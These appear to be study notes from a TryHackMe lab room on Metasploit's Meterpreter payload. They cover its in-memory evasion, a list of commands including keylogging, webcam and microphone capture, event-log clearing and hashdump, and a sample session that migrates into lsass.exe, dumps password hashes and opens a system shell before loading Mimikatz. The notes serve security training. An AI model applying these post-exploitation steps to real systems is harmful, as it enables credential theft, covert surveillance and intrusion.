Meterpreter
https://tryhackme.com/r/room/meterpreter

Meterpreter is a Metasploit payload that supports the penetration testing process with many valuable components. Meterpreter will run on the target system and act as an agent within a command and control architecture.
Meterpreter runs on a target system without being installed on it. It runs in memory (RAM - Random Access Memory) and does not write itself to the disk on the target. Meterpreter thus tries to avoid being detected by antivirus and is seen as a process and does not have a file on the target system. Meterpreter also uses encrypted communication with the server where Metasploit runs.
Use the following command to display meterpreter payloads:
msfvenom --list payloads | grep meterpreter
Meterpreter Commands
Core commands:
?
: Help Menubackground
: Backgrounds current sessionexit
: Terminates sessionguid
: Get session GUIDinfo
: Display post module informationirb
: Opens interactive ruby shellload
: Loads one or more meterpreter extensionsmigrate
: Migrates meterpreter process to another processrun
: Executes a meterpreter script or post modulesessions
: Quickly switch to another session
File and networking commands:
search
: Searches for filesupload
: Uploads file or directorydownload
: Downloads a file or directorynetstat
: Displays the network connectionsportfwd
: Forwards a local port to a remote serviceroute
: Allows to view and modify routing table
System commands:
clearev
: Clears events logsexecute
: Executes a commandgetpid
: Shows current process identifierkill
: Terminates processreboot
: Reboots remote computershell
: Drops into system command shellsysinfo
: Gets information about remote system
Other commands:
idletime
: Returns the number of seconds remote user is idlekeyscan_dump
: Dumps the keystroke bufferkeyscan_start
: Starts capturing keystrokeskeyscan_stop
: Stops capturing keystrokesscreenshare
: Allows you to watch the remote user's desktoprecord_mic
: Records audio from default microphonewebcam_chat
: Starts video chatwebcam_stream
: Plays a video stream from the specified webcamgetsystem
: Attempts to elevate privilegehashdump
: Dumps contents of SAM database
Post Exploitation
The migrate
command is a way to migrate to another process to aid in continued interaction. This can be helpful to creat a more stable meterpreter session. It can also be used to conduct keylogger attacks by migrating to a process like word.exe, notepad.exe, or even a browser.
The following would be a sample command execution involving migration:
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > ps
PID PPID Name Arch Session User
--- ---- ---- ---- ------- ----
716 596 lsass.exe x64 0 NT AUTHORITY\SYSTEM
...
meterpreter > migrate 716
[*] Migrating from 1304 to 716...
[*] Migration completed successfully.
meterpreter > hashdump
Administrator:500:aad3b51404eeab3b456b51:31243f0ae90cc89c0:::
meterpreter > shell
Process 2124 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
Post exploitation using meterpreter can be split into the following categories:
Gathering further intelligence about the target system
Searching for files, credentials, interfaces, and further information
Privilege escalation
Lateral movement
The following command can be used to load Mimikatz, a great tool for post exploitation and privilege escalation on Windows machines:
meterpreter > load kiwi
Loading extention kiwi... mimikatz 2.2.0 20191125 (x64/windows)
Last updated